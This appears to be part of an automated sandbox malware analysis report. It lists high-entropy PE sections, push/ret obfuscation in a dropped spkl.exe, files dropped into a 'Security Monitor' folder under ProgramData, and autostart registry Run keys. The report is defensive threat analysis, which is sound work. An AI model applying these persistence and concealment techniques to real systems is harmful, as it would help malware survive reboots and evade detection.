Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: .d
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: .adata
Source: is-67IFD.tmp.22.dr	Static PE information: section name: .rodata
Source: is-67IFD.tmp.22.dr	Static PE information: section name: .rotext
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name: .adata
Source: is-EO3DV.tmp.22.dr	Static PE information: section name: .didata
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /4
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /19
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /31
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /45
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /57
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /70
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /81
Source: is-1I5NJ.tmp.22.dr	Static PE information: section name: /92
Source: ffws.exe.56.dr	Static PE information: section name: .rodata
Source: ffws.exe.56.dr	Static PE information: section name: .rotext

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Code function: 7_2_08EBFDB8 push esp; retf	7_2_08EBFDB9
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_008650DC push 00865161h; ret	56_2_00865159
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00865B30 push 00865BB6h; ret	56_2_00865BAE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086DEA3 push cs; ret	56_2_0086DEB4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_008660D4 push 0086613Ch; ret	56_2_00866134
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086D2D4 push cs; iretd	56_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00872002 push 00000075h; retf	56_2_00872004
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00874401 push ecx; ret	56_2_00874402
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00869C0D push eax; ret	56_2_00869C8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086524C push 008652D7h; ret	56_2_008652CF
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086D586 push ebx; ret	56_2_0086D587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00865188 push 00865230h; ret	56_2_00865228
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_008675AC push 008675D9h; ret	56_2_008675D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0086D3D6 push cs; iretd	56_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00865DFC push 00865E74h; ret	56_2_00865E6C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_00867550 push 0086759Ah; ret	56_2_00867592
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_007B16A4 push 007B17DEh; ret	56_2_007B17D6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033CE001 push eax; ret	56_2_033CE108
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_033CE001 push 033B4EC0h; ret	56_2_033CE5D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C310 push 0337C37Fh; ret	56_2_0337C377
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337F344 push 0337F3A1h; ret	56_2_0337F399
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C390 push 0337C3BCh; ret	56_2_0337C3B4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C388 push 0337C3BCh; ret	56_2_0337C3B4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_03375BF8 push 03375C5Dh; ret	56_2_03375C55
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C3C8 push 0337C3F4h; ret	56_2_0337C3EC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0338110C push ecx; mov dword ptr [esp], eax	56_2_03381111
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337D1FC push 0337D228h; ret	56_2_0337D220
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337D1FA push 0337D228h; ret	56_2_0337D220
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337C1D0 push 0337C30Dh; ret	56_2_0337C305
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_0337573D push eax; ret	56_2_03375779
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 56_2_03375F2C push 03375F58h; ret	56_2_03375F50

Source: [space]= .exe.6.dr	Static PE information: section name: .text entropy: 7.81759162350406
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.970560832581065
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.995359849273399
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.98989686324796
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.581553890924904
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: entropy: 7.998441689187187
Source: is-9U2JI.tmp.22.dr	Static PE information: section name: .d entropy: 7.923610064617086
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.972249623981622
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.99458999281375
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.992015849394924
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.515192733866904
Source: is-719F1.tmp.22.dr	Static PE information: section name: entropy: 7.998936896615619
Source: is-719F1.tmp.22.dr	Static PE information: section name: .rsrc entropy: 7.953583660494071
Source: is-719F1.tmp.22.dr	Static PE information: section name: .data entropy: 7.561972396742998

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe	File created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JLPKJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	File created: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-719F1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-GD8FS.tmp	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JLPKJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-719F1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-GD8FS.tmp	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
